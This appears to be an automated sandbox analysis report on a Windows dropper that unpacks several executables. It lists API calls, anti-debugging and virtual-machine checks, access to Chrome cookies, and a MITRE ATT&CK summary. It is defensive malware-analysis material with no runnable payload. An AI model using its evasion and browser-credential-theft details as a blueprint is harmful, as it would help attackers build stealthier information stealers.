Source: C:\Users\user\Desktop\KeJ7Cl7flZ.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\RarSFX0\file1.exeJump to dropped file
Source: C:\Users\user\Desktop\KeJ7Cl7flZ.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\RarSFX0\ubisoftpro.exeJump to dropped file
Source: C:\Program Files (x86)\ujvqkl7ofji6\aliens.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\85F91A36E275562F.exeJump to dropped file
Source: C:\Program Files (x86)\ujvqkl7ofji6\aliens.exeCode function: 19_2_100202D0
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\jg2_2qua.exe TID: 5720Thread sleep time: -30000s >= -30000s
Source: C:\Windows\SysWOW64\WerFault.exeFile opened: PhysicalDrive0
Source: C:\Program Files (x86)\ujvqkl7ofji6\aliens.exeCode function: 19_2_100223C0 GetLocalTime followed by cmp: cmp ecx, 01h and CTI: jl 10022474h
Source: C:\Program Files (x86)\ujvqkl7ofji6\aliens.exeCode function: 19_2_100223C0 GetLocalTime followed by cmp: cmp edx, 08h and CTI: jnle 10022474h
Source: C:\Users\user\Desktop\KeJ7Cl7flZ.exeCode function: 0_2_00EC29A3 FindFirstFileW,FindFirstFileW,GetLastError,FindNextFileW,GetLastError,
Source: C:\Users\user\Desktop\KeJ7Cl7flZ.exeCode function: 0_2_00ED0BA0 SendDlgItemMessageW,GetDlgItem,SetFocus,SetDlgItemTextW,SendDlgItemMessageW,FindFirstFileW,FileTimeToLocalFileTime,FileTimeToSystemTime,GetTimeFormatW,GetDateFormatW,_swprintf,SetDlgItemTextW,FindClose,_swprintf,SetDlgItemTextW,SendDlgItemMessageW,FileTimeToLocalFileTime,FileTimeToSystemTime,GetTimeFormatW,GetDateFormatW,_swprintf,SetDlgItemTextW,_swprintf,SetDlgItemTextW,
Source: C:\Users\user\Desktop\KeJ7Cl7flZ.exeCode function: 0_2_00EDFB78 FindFirstFileExA,
Source: C:\Users\user\Desktop\KeJ7Cl7flZ.exeCode function: 0_2_00ED2E67 VirtualQuery,GetSystemInfo,FindFirstFileExA,
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\002.exeCode function: 1_2_012746B9 __EH_prolog3_GS,GetFullPathNameA,__cftof,PathIsUNCA,GetVolumeInformationA,CharUpperA,FindFirstFileA,FindClose,_strlen,
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\002.exeCode function: 1_2_10009DF3 _memset,GetEnvironmentVariableW,_wprintf,FindFirstFileW,__snprintf_s,FindNextFileW,FindClose,
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\Setup.exeCode function: 15_2_00406CC7 DeleteFileW,lstrcatW,lstrcatW,lstrcatW,lstrlenW,FindFirstFileW,DeleteFileW,FindNextFileW,FindClose,RemoveDirectoryW,
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\Setup.exeCode function: 15_2_00406301 FindFirstFileW,FindClose,
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\Setup.exeCode function: 15_2_6FEE0F62 GetFileAttributesW,GetLastError,GetLastError,SetFileAttributesW,GetLastError,GetTempPathW,GetLastError,FindFirstFileW,GetLastError,SetFileAttributesW,DeleteFileW,GetTempFileNameW,MoveFileExW,MoveFileExW,MoveFileExW,FindNextFileW,GetLastError,GetLastError,GetLastError,GetLastError,RemoveDirectoryW,GetLastError,MoveFileExW,GetLastError,FindClose,
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\Setup.exeCode function: 15_2_6FED1C23 __EH_prolog3_GS,GetFullPathNameW,PathIsUNCW,GetVolumeInformationW,CharUpperW,FindFirstFileW,FindClose,
Source: C:\Users\user\AppData\Local\Temp\sib309A.tmp\0\setup.exeCode function: 17_2_0005A534 FindFirstFileW,FindFirstFileW,GetLastError,FindNextFileW,GetLastError,
Source: C:\Users\user\AppData\Local\Temp\sib309A.tmp\0\setup.exeCode function: 17_2_0006B820 SendDlgItemMessageW,EndDialog,GetDlgItem,SetFocus,SetDlgItemTextW,SendDlgItemMessageW,FindFirstFileW,FileTimeToLocalFileTime,FileTimeToSystemTime,GetTimeFormatW,GetDateFormatW,_swprintf,SetDlgItemTextW,FindClose,_swprintf,SetDlgItemTextW,SendDlgItemMessageW,FileTimeToLocalFileTime,FileTimeToSystemTime,GetTimeFormatW,GetDateFormatW,_swprintf,SetDlgItemTextW,_swprintf,SetDlgItemTextW,
Source: C:\Users\user\AppData\Local\Temp\sib309A.tmp\0\setup.exeCode function: 17_2_0007A928 FindFirstFileExA,
Source: C:\Program Files (x86)\ujvqkl7ofji6\aliens.exeCode function: 19_2_00452126 FindFirstFileW,Sleep,FindNextFileW,FindClose,
Source: C:\Program Files (x86)\ujvqkl7ofji6\aliens.exeCode function: 19_2_0045C999 FindFirstFileW,FindNextFileW,FindClose,
Source: C:\Program Files (x86)\ujvqkl7ofji6\aliens.exeCode function: 19_2_00436ADE GetFileAttributesW,FindFirstFileW,FindClose,
Source: C:\Program Files (x86)\ujvqkl7ofji6\aliens.exeCode function: 19_2_00434BEE FindFirstFileW,FindFirstFileW,GetFileAttributesW,SetFileAttributesW,FindNextFileW,FindClose,FindClose,FindClose,FindFirstFileW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,
Source: C:\Program Files (x86)\ujvqkl7ofji6\aliens.exeCode function: 19_2_0045DD7C FindFirstFileW,FindClose,
Source: C:\Program Files (x86)\ujvqkl7ofji6\aliens.exeCode function: 19_2_0044BD29 _wcscat,_wcscat,__wsplitpath,FindFirstFileW,CopyFileW,_wcscpy,_wcscat,_wcscat,lstrcmpiW,DeleteFileW,MoveFileW,CopyFileW,DeleteFileW,CopyFileW,FindClose,MoveFileW,FindNextFileW,FindClose,
Source: C:\Program Files (x86)\ujvqkl7ofji6\aliens.exeCode function: 19_2_00436D2D FindFirstFileW,CreateFileW,SetFileTime,CloseHandle,SetFileTime,CloseHandle,
Source: C:\Program Files (x86)\ujvqkl7ofji6\aliens.exeCode function: 19_2_00442E1F SetCurrentDirectoryW,FindFirstFileW,SetCurrentDirectoryW,FindFirstFileW,FindNextFileW,FindClose,FindClose,FindClose,FindFirstFileW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,
Source: C:\Program Files (x86)\ujvqkl7ofji6\aliens.exeCode function: 19_2_00475FE5 FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,
Source: C:\Program Files (x86)\ujvqkl7ofji6\aliens.exeCode function: 19_2_0044BF8D _wcscat,__wsplitpath,FindFirstFileW,_wcscpy,_wcscat,_wcscat,DeleteFileW,FindNextFileW,FindClose,FindClose,
Source: C:\Program Files (x86)\ujvqkl7ofji6\aliens.exeCode function: 19_2_1001A170 FindFirstFileA,FindClose,
Source: C:\Users\user\Desktop\KeJ7Cl7flZ.exeCode function: 0_2_00ED2E67 VirtualQuery,GetSystemInfo,FindFirstFileExA,
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\Setup.exeFile opened: C:\Users\user\Documents\desktop.ini
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\Setup.exeFile opened: C:\Users\user
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\Setup.exeFile opened: C:\Users\user\AppData\Local\Temp
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\Setup.exeFile opened: C:\Users\user\AppData
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\Setup.exeFile opened: C:\Users\user\AppData\Local
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\Setup.exeFile opened: C:\Users\user\Desktop\desktop.ini
Source: jg2_2qua.exe, 0000001A.00000002.506529883.000000000071B000.00000004.00000020.sdmpBinary or memory string: Hyper-V RAW9x
Source: WerFault.exe, 00000007.00000002.282007693.0000000004742000.00000004.00000001.sdmpBinary or memory string: Hyper-V RAWx
Source: WerFault.exe, 00000004.00000002.256297589.00000000051C0000.00000002.00000001.sdmp, WerFault.exe, 00000007.00000002.282285253.0000000004B00000.00000002.00000001.sdmpBinary or memory string: A Virtual Machine could not be started because Hyper-V is not installed.
Source: WerFault.exe, 00000004.00000002.256232825.00000000050ED000.00000004.00000001.sdmpBinary or memory string: Hyper-V RAW-
Source: WerFault.exe, 00000004.00000003.253459157.0000000005187000.00000004.00000001.sdmp, WerFault.exe, 00000007.00000002.281941675.0000000004685000.00000004.00000001.sdmp, aliens.exe, 00000013.00000002.508576720.0000000000BB7000.00000004.00000020.sdmp, jg2_2qua.exe, 0000001A.00000002.506529883.000000000071B000.00000004.00000020.sdmpBinary or memory string: Hyper-V RAW
Source: aliens.exe, 00000013.00000002.508446733.0000000000B6A000.00000004.00000020.sdmpBinary or memory string: Hyper-V RAW(X
Source: aliens.exe, 00000013.00000002.507967540.00000000008CC000.00000004.00000001.sdmpBinary or memory string: VMware Virtual disk 2.0
Source: aliens.exe, 00000013.00000002.507967540.00000000008CC000.00000004.00000001.sdmpBinary or memory string: VMware
Source: WerFault.exe, 00000004.00000002.256297589.00000000051C0000.00000002.00000001.sdmp, WerFault.exe, 00000007.00000002.282285253.0000000004B00000.00000002.00000001.sdmpBinary or memory string: A communication protocol error has occurred between the Hyper-V Host and Guest Compute Service.
Source: WerFault.exe, 00000004.00000002.256297589.00000000051C0000.00000002.00000001.sdmp, WerFault.exe, 00000007.00000002.282285253.0000000004B00000.00000002.00000001.sdmpBinary or memory string: The communication protocol version between the Hyper-V Host and Guest Compute Services is not supported.
Source: jg2_2qua.exe, 0000001A.00000003.498781258.00000000040A8000.00000004.00000001.sdmpBinary or memory string: https://arc.msn.com/v3/Delivery/Placement?pubid=da63df93-3dbc-42ae-a505-b34988683ac7&pid=314559&adm=2&w=1&h=1&wpx=1&hpx=1&fmt=json&cltp=app&dim=le&rafb=0&nct=1&pm=1&cfmt=text,image,poly&sft=jpeg,png,gif&topt=1&poptin=0&localid=w:FE8E72D9-9324-F27F-91C7-FEE66B531521&ctry=US&time=20200930T144711Z&lc=en-US&pl=en-US&idtp=mid&uid=8706df6d-9543-4122-b8e1-1fcdd5939be6&aid=00000000-0000-0000-0000-000000000000&ua=WindowsShellClient%2F9.0.40929.0%20%28Windows%29&asid=93ad7adba3804ae29988afa9c571d584&ctmode=MultiSession&arch=x64&cdm=1&cdmver=10.0.17134.1&devfam=Windows.Desktop&devform=Unknown&devosver=10.0.17134.1&disphorzres=1280&dispsize=17.1&dispvertres=1024&isu=0&lo=663612&metered=false&nettype=ethernet&npid=sc-314559&oemName=VMware%2C%20Inc.&oemid=VMware%2C%20Inc.&ossku=Professional&smBiosDm=VMware7%2C1&tl=2&tsu=663612&waasBldFlt=1&waasCfgExp=1&waasCfgSet=1&waasRetail=1&waasRing=
Source: WerFault.exe, 00000004.00000002.256297589.00000000051C0000.00000002.00000001.sdmp, WerFault.exe, 00000007.00000002.282285253.0000000004B00000.00000002.00000001.sdmpBinary or memory string: An unknown internal message was received by the Hyper-V Compute Service.
Source: C:\Windows\SysWOW64\WerFault.exeProcess information queried: ProcessInformation

Anti Debugging:

barindex
Contains functionality to check if a debugger is running (CheckRemoteDebuggerPresent)Show sources
Source: C:\Program Files (x86)\ujvqkl7ofji6\aliens.exeCode function: 19_2_10019FF0 GetCurrentProcess,CheckRemoteDebuggerPresent,
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\002.exeProcess queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\002.exeProcess queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\002.exeCode function: 1_2_01269311 __ehhandler$?ConvertBSTRToString@_com_util@@YGPADPAG@Z,__EH_prolog3,LdrInitializeThunk,
Source: C:\Users\user\Desktop\KeJ7Cl7flZ.exeCode function: 0_2_00EDD6D2 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\002.exeCode function: 1_2_0126294A OutputDebugStringA,GetLastError,
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\002.exeCode function: 1_2_012865B6 VirtualProtect ?,-00000001,00000104,?,?,?,0000001C
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\002.exeCode function: 1_2_01262070 IsBadReadPtr,LoadLibraryA,GetProcAddress,IsBadReadPtr,Sleep,
Source: C:\Users\user\Desktop\KeJ7Cl7flZ.exeCode function: 0_2_00EDC507 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\Setup.exeCode function: 15_2_6FEF2571 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\Setup.exeCode function: 15_2_6FEF80EB mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\AppData\Local\Temp\sib309A.tmp\0\setup.exeCode function: 17_2_00077363 mov eax, dword ptr fs:[00000030h]
Source: C:\Program Files (x86)\ujvqkl7ofji6\aliens.exeCode function: 19_2_004175F6 mov eax, dword ptr fs:[00000030h]
Source: C:\Program Files (x86)\ujvqkl7ofji6\aliens.exeCode function: 19_2_10019DE0 mov eax, dword ptr fs:[00000030h]
Source: C:\Program Files (x86)\ujvqkl7ofji6\aliens.exeCode function: 19_2_10019E10 mov eax, dword ptr fs:[00000030h]
Source: C:\Program Files (x86)\ujvqkl7ofji6\aliens.exeCode function: 19_2_10019E10 mov eax, dword ptr fs:[00000030h]
Source: C:\Program Files (x86)\ujvqkl7ofji6\aliens.exeCode function: 19_2_10019E70 mov eax, dword ptr fs:[00000030h]
Source: C:\Program Files (x86)\ujvqkl7ofji6\aliens.exeCode function: 19_2_10019E70 mov eax, dword ptr fs:[00000030h]
Source: C:\Program Files (x86)\ujvqkl7ofji6\aliens.exeCode function: 19_2_10019ED0 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\KeJ7Cl7flZ.exeCode function: 0_2_00EE07E0 GetProcessHeap,
Source: C:\Windows\SysWOW64\WerFault.exeProcess token adjusted: Debug
Source: C:\Windows\SysWOW64\WerFault.exeProcess token adjusted: Debug
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\Setup.exeProcess created: C:\Users\user\AppData\Local\Temp\sib309A.tmp\0\setup.exe 'C:\Users\user\AppData\Local\Temp\sib309A.tmp\0\setup.exe' -s
Source: C:\Users\user\Desktop\KeJ7Cl7flZ.exeCode function: 0_2_00ED3FBC SetUnhandledExceptionFilter,
Source: C:\Users\user\Desktop\KeJ7Cl7flZ.exeCode function: 0_2_00ED431B SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,
Source: C:\Users\user\Desktop\KeJ7Cl7flZ.exeCode function: 0_2_00EDD6D2 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,
Source: C:\Users\user\Desktop\KeJ7Cl7flZ.exeCode function: 0_2_00ED3E2A IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\002.exeCode function: 1_2_01289B5E SetUnhandledExceptionFilter,
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\002.exeCode function: 1_2_01289B8F SetUnhandledExceptionFilter,UnhandledExceptionFilter,
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\002.exeCode function: 1_2_10086DCE SetUnhandledExceptionFilter,UnhandledExceptionFilter,
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\Setup.exeCode function: 15_2_6FEDFB78 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\Setup.exeCode function: 15_2_6FEE52CE IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,
Source: C:\Users\user\AppData\Local\Temp\sib309A.tmp\0\setup.exeCode function: 17_2_0006EEB3 SetUnhandledExceptionFilter,
Source: C:\Users\user\AppData\Local\Temp\sib309A.tmp\0\setup.exeCode function: 17_2_0006F07B SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,
Source: C:\Users\user\AppData\Local\Temp\sib309A.tmp\0\setup.exeCode function: 17_2_000784EF IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,
Source: C:\Users\user\AppData\Local\Temp\sib309A.tmp\0\setup.exeCode function: 17_2_0006ED65 IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,
Source: C:\Program Files (x86)\ujvqkl7ofji6\aliens.exeCode function: 19_2_0042202E SetUnhandledExceptionFilter,
Source: C:\Program Files (x86)\ujvqkl7ofji6\aliens.exeCode function: 19_2_004230F5 _raise,_memset,SetUnhandledExceptionFilter,UnhandledExceptionFilter,
Source: C:\Program Files (x86)\ujvqkl7ofji6\aliens.exeCode function: 19_2_00421FA7 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,
Source: C:\Program Files (x86)\ujvqkl7ofji6\aliens.exeCode function: 19_2_10015354 SetUnhandledExceptionFilter,__encode_pointer,
Source: C:\Program Files (x86)\ujvqkl7ofji6\aliens.exeCode function: 19_2_10015376 __decode_pointer,SetUnhandledExceptionFilter,
Source: C:\Program Files (x86)\ujvqkl7ofji6\aliens.exeCode function: 19_2_10018413 __NMSG_WRITE,_raise,_memset,SetUnhandledExceptionFilter,UnhandledExceptionFilter,RtlUnwind,
Source: C:\Program Files (x86)\ujvqkl7ofji6\aliens.exeCode function: 19_2_1000E44D _memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,
Source: C:\Program Files (x86)\ujvqkl7ofji6\aliens.exeCode function: 19_2_1000EFFC IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\Setup.exeMemory allocated: page read and write | page guard
Source: C:\Program Files (x86)\ujvqkl7ofji6\aliens.exeCode function: 19_2_0043916A LogonUserW,
Source: C:\Program Files (x86)\ujvqkl7ofji6\aliens.exeCode function: 19_2_0040D6D0 GetCurrentDirectoryW,IsDebuggerPresent,GetFullPathNameW,SetCurrentDirectoryW,MessageBoxA,SetCurrentDirectoryW,GetModuleFileNameW,GetForegroundWindow,ShellExecuteW,GetForegroundWindow,ShellExecuteW,
Source: C:\Program Files (x86)\ujvqkl7ofji6\aliens.exeCode function: 19_2_004375B0 GetForegroundWindow,FindWindowW,IsIconic,ShowWindow,SetForegroundWindow,GetWindowThreadProcessId,GetWindowThreadProcessId,GetCurrentThreadId,GetWindowThreadProcessId,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,SetForegroundWindow,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,SetForegroundWindow,AttachThreadInput,AttachThreadInput,AttachThreadInput,
Source: C:\Program Files (x86)\ujvqkl7ofji6\aliens.exeCode function: 19_2_00436431 __wcsicoll,mouse_event,__wcsicoll,mouse_event,
Source: C:\Users\user\Desktop\KeJ7Cl7flZ.exeProcess created: C:\Users\user\AppData\Local\Temp\RarSFX0\002.exe 'C:\Users\user\AppData\Local\Temp\RarSFX0\002.exe'
Source: C:\Users\user\Desktop\KeJ7Cl7flZ.exeProcess created: C:\Users\user\AppData\Local\Temp\RarSFX0\Setup.exe 'C:\Users\user\AppData\Local\Temp\RarSFX0\Setup.exe'
Source: C:\Users\user\Desktop\KeJ7Cl7flZ.exeProcess created: C:\Users\user\AppData\Local\Temp\RarSFX0\jg2_2qua.exe 'C:\Users\user\AppData\Local\Temp\RarSFX0\jg2_2qua.exe'
Source: C:\Users\user\AppData\Local\Temp\sib309A.tmp\0\setup.exeProcess created: C:\Program Files (x86)\ujvqkl7ofji6\aliens.exe 'C:\Program Files (x86)\ujvqkl7ofji6\aliens.exe'
Source: C:\Program Files (x86)\ujvqkl7ofji6\aliens.exeCode function: 19_2_00445DD3 GetSecurityDescriptorDacl,_memset,GetAclInformation,GetLengthSid,GetAce,AddAce,GetLengthSid,GetLengthSid,CopySid,AddAce,SetSecurityDescriptorDacl,SetUserObjectSecurity,
Source: KeJ7Cl7flZ.exe, 00000000.00000002.509070040.00000000039C0000.00000002.00000001.sdmp, aliens.exe, jg2_2qua.exe, 0000001A.00000002.508050417.0000000000DF0000.00000002.00000001.sdmpBinary or memory string: Shell_TrayWnd
Source: KeJ7Cl7flZ.exe, 00000000.00000002.509070040.00000000039C0000.00000002.00000001.sdmp, aliens.exe, 00000013.00000002.508783062.0000000001AF0000.00000002.00000001.sdmp, jg2_2qua.exe, 0000001A.00000002.508050417.0000000000DF0000.00000002.00000001.sdmpBinary or memory string: Progman
Source: KeJ7Cl7flZ.exe, 00000000.00000002.509070040.00000000039C0000.00000002.00000001.sdmp, aliens.exe, 00000013.00000002.508783062.0000000001AF0000.00000002.00000001.sdmp, jg2_2qua.exe, 0000001A.00000002.508050417.0000000000DF0000.00000002.00000001.sdmpBinary or memory string: SProgram Managerl
Source: aliens.exe, 00000013.00000002.507373439.0000000000482000.00000002.00020000.sdmp, 85F91A36E275562F.exe.19.drBinary or memory string: @3PDASCRWINUPRWINDOWNLWINUPLWINDOWNSHIFTUPSHIFTDOWNALTUPALTDOWNCTRLUPCTRLDOWNMOUSE_XBUTTON2MOUSE_XBUTTON1MOUSE_MBUTTONMOUSE_RBUTTONMOUSE_LBUTTONLAUNCH_APP2LAUNCH_APP1LAUNCH_MEDIALAUNCH_MAILMEDIA_PLAY_PAUSEMEDIA_STOPMEDIA_PREVMEDIA_NEXTVOLUME_UPVOLUME_DOWNVOLUME_MUTEBROWSER_HOMEBROWSER_FAVORTIESBROWSER_SEARCHBROWSER_STOPBROWSER_REFRESHBROWSER_FORWARDBROWSER_BACKNUMPADENTERSLEEPRSHIFTLSHIFTRALTLALTRCTRLLCTRLAPPSKEYNUMPADDIVNUMPADDOTNUMPADSUBNUMPADADDNUMPADMULTNUMPAD9NUMPAD8NUMPAD7NUMPAD6NUMPAD5NUMPAD4NUMPAD3NUMPAD2NUMPAD1NUMPAD0CAPSLOCKPAUSEBREAKNUMLOCKSCROLLLOCKRWINLWINPRINTSCREENUPTABSPACERIGHTPGUPPGDNLEFTINSERTINSHOMEF12F11F10F9F8F7F6F5F4F3F2F1ESCAPEESCENTERENDDOWNDELETEDELBSBACKSPACEALTONOFF0%d%dShell_TrayWndExitScript Pausedblankinfoquestionstopwarning
Source: KeJ7Cl7flZ.exe, 00000000.00000002.509070040.00000000039C0000.00000002.00000001.sdmp, aliens.exe, 00000013.00000002.508783062.0000000001AF0000.00000002.00000001.sdmp, jg2_2qua.exe, 0000001A.00000002.508050417.0000000000DF0000.00000002.00000001.sdmpBinary or memory string: Shell_TrayWnd,
Source: KeJ7Cl7flZ.exe, 00000000.00000002.509070040.00000000039C0000.00000002.00000001.sdmp, aliens.exe, 00000013.00000002.508783062.0000000001AF0000.00000002.00000001.sdmp, jg2_2qua.exe, 0000001A.00000002.508050417.0000000000DF0000.00000002.00000001.sdmpBinary or memory string: Progmanlock
Source: C:\Users\user\Desktop\KeJ7Cl7flZ.exeCode function: 0_2_00EC6951 cpuid
Source: C:\Users\user\Desktop\KeJ7Cl7flZ.exeCode function: GetLocaleInfoW,GetNumberFormatW,
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\002.exeCode function: GetModuleHandleW,GetProcAddress,EncodePointer,RtlDecodePointer,GetLocaleInfoEx,GetLocaleInfoW,
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\002.exeCode function: _wcscmp,_wcscmp,GetLocaleInfoW,GetLocaleInfoW,GetACP,
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\002.exeCode function: LdrInitializeThunk,EnumSystemLocalesW,
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\002.exeCode function: _memset,_TranslateName,_GetLcidFromLangCountry,_GetLcidFromLanguage,_TranslateName,_GetLcidFromLangCountry,_GetLcidFromLanguage,_GetLcidFromCountry,GetUserDefaultLCID,IsValidCodePage,LdrInitializeThunk,IsValidLocale,___crtDownlevelLCIDToLocaleName,___crtDownlevelLCIDToLocaleName,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,__itow_s,
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\002.exeCode function: GetLocaleInfoW,
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\002.exeCode function: _TranslateName,_GetLocaleNameFromLangCountry,_GetLocaleNameFromLanguage,_TranslateName,_GetLocaleNameFromLangCountry,_GetLocaleNameFromLanguage,_GetLocaleNameFromDefault,IsValidCodePage,LdrInitializeThunk,_wcschr,_wcschr,__itow_s,__invoke_watson,_LcidFromHexString,GetLocaleInfoW,
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\002.exeCode function: LdrInitializeThunk,EnumSystemLocalesW,
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\002.exeCode function: _GetPrimaryLen,LdrInitializeThunk,EnumSystemLocalesW,
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\002.exeCode function: _GetPrimaryLen,LdrInitializeThunk,EnumSystemLocalesW,
Source: C:\Users\user\AppData\Local\Temp\sib309A.tmp\0\setup.exeCode function: GetLocaleInfoW,GetNumberFormatW,
Source: C:\Program Files (x86)\ujvqkl7ofji6\aliens.exeCode function: GetLocaleInfoA,
Source: C:\Program Files (x86)\ujvqkl7ofji6\aliens.exeCode function: 19_2_10019780 SetupDiGetDeviceRegistryPropertyA,GetLastError,_memset,SetupDiGetDeviceRegistryPropertyA,
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\Setup.exeQueries volume information: C:\Users\user\AppData\Local\Temp\sib309A.tmp\SibClr.dll VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\Setup.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.JScript\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.JScript.dll VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\jg2_2qua.exeQueries volume information: C:\Users\user\AppData\Local\Temp\RarSFX0\d VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\jg2_2qua.exeQueries volume information: C:\Users\user\AppData\Local\Temp\RarSFX0\tmp.edb VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\jg2_2qua.exeQueries volume information: C:\Users\user\AppData\Local\Temp\RarSFX0\d VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\jg2_2qua.exeQueries volume information: C:\Users\user\AppData\Local\Temp\RarSFX0\d.jfm VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\jg2_2qua.exeQueries volume information: C:\Users\user\AppData\Local\Temp\RarSFX0\d VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\jg2_2qua.exeQueries volume information: C:\Users\user\AppData\Local\Temp\RarSFX0\d VolumeInformation
Source: C:\Users\user\Desktop\KeJ7Cl7flZ.exeCode function: 0_2_00ED273E GetCommandLineW,OpenFileMappingW,MapViewOfFile,UnmapViewOfFile,CloseHandle,GetModuleFileNameW,SetEnvironmentVariableW,GetLocalTime,_swprintf,SetEnvironmentVariableW,GetModuleHandleW,LoadIconW,DialogBoxParamW,Sleep,CloseHandle,
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\002.exeCode function: 1_2_01290004 __lock,____lc_codepage_func,__getenv_helper_nolock,_free,_strlen,LdrInitializeThunk,__malloc_crt,_strlen,LdrInitializeThunk,__invoke_watson,_free,GetTimeZoneInformation,WideCharToMultiByte,WideCharToMultiByte,LdrInitializeThunk,
Source: C:\Users\user\Desktop\KeJ7Cl7flZ.exeCode function: 0_2_00EC2B26 GetVersionExW,
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\Setup.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Stealing of Sensitive Information:

barindex
Tries to harvest and steal browser information (history, passwords, etc)Show sources
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\jg2_2qua.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Cookies
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\Setup.exeCode function: 15_2_6FEA94C0 LoadLibraryW,GetLastError,GetProcAddress,GetLastError,FreeLibrary,CorBindToRuntimeEx,FreeLibrary,FreeLibrary,FreeLibrary,
Source: C:\Program Files (x86)\ujvqkl7ofji6\aliens.exeCode function: 19_2_0047AD92 OleInitialize,_wcslen,CreateBindCtx,MkParseDisplayName,CLSIDFromProgID,GetActiveObject,

Mitre Att&ck Matrix

Initial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionExfiltrationCommand and ControlNetwork EffectsRemote Service EffectsImpact
Valid Accounts2Native API1DLL Side-Loading1Exploitation for Privilege Escalation1Disable or Modify Tools21OS Credential Dumping1System Time Discovery12Remote ServicesArchive Collected Data1Exfiltration Over Other Network MediumIngress Tool Transfer2Eavesdrop on Insecure Network CommunicationRemotely Track Device Without AuthorizationSystem Shutdown/Reboot1
